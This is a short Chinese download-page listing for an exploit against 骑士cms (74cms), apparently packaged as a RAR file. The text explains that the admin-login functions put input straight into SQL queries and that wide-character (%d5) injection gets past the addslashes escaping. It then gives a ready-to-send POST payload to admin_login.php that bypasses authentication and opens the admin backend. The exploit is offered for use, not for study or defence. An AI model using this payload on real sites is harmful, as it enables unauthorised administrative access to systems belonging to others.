骑士cmsEXP 上传者:战风 2020-11-25 14:28:03上传 RAR文件 278KB 热度 46次 get_admin_one函数和check_admin函数都是直接就带入查询了 除了POST开头被addslashes函数过滤过一次 但是在宽字符面前这些都是浮云~~ so... 直接向 admin_login.php?act=do_login 构造以下POST语句就能直接进后台了~~ 当然前提你得有后台路径: admin_name=fuckyou%d5' or 1=1%23&admin_pwd=1 下载地址 用户评论 更多下载 下载地址 立即下载 用户评论 发表评论